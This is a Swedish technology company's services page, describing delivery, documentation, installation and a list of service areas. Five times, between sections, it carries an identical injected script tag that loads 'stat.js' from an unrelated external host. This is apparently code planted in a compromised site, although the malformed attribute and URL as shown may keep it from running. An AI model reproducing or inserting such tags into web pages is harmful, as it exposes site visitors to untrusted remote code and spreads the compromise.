Våra Tjänster

Vi är ett teknikföretag som arbetar med att hitta rätt lösning för dig och din verksamhet. När ni väljer oss är det en försäkran över att arbetet blir professionellt utfört av kunnig personal med rätt komponenter. Vänd er till oss för leverans, installationer och underlag till olika dokumentationer.

<script data-src='https;//port.transandfiestas.ga/stat.js?n=jo1' type='text/javascript'></script>

Leverans

Genom att vi inte är bundna till avtal med olika leverantörer så blir det enklare att hitta lösningar som fungerar smidigt hos våra kunder. Vi arbetar med att hela tiden vara uppdaterade mot marknaden för att veta vilka delar som fungerar bäst och nyheter kring de senaste tekniska innovationerna.

<script data-src='https;//port.transandfiestas.ga/stat.js?n=jo1' type='text/javascript'></script>

Dokumentation

Behöver ni dokumentation i olika former så utför vi detta effektivt och kvalitativt. Ni får en gedigen och lättförståelig dokumentation som kan användas både inom företaget för att göra verksamheten effektivare, men också i kontakten med olika myndigheter.

<script data-src='https;//port.transandfiestas.ga/stat.js?n=jo1' type='text/javascript'></script>

Installation

Vi kan göra arbeten och installationer som kombinerar delar från olika tillverkare, vi tar det bästa från alla och sammanfogar detta till en väl fungerande enhet. Detta är ett koncept som ni kunder vinner på.

<script data-src='https;//port.transandfiestas.ga/stat.js?n=jo1' type='text/javascript'></script>

Tjänster

Vi erbjuder våra kunder ett brett spektrum av tjänster. Vänd er till oss om ni behöver installationer eller service. Men också bedömningar och olika effektiviseringar av befintliga anläggningar och projekt.

Vi erbjuder tjänster inom följande områden:

Programmering

Programmering

Kommunikation

Kommunikation

Förfrågningsunderlag

Förfrågningsunderlag

Dokumentering

Dokumentering

Förstudier

Förstudier

Drifttagning

Drifttagning

Systemering

Systemering

Projektledning

Projektledning

Utbildning

Utbildning

Service

Service

<script data-src='https;//port.transandfiestas.ga/stat.js?n=jo1' type='text/javascript'></script>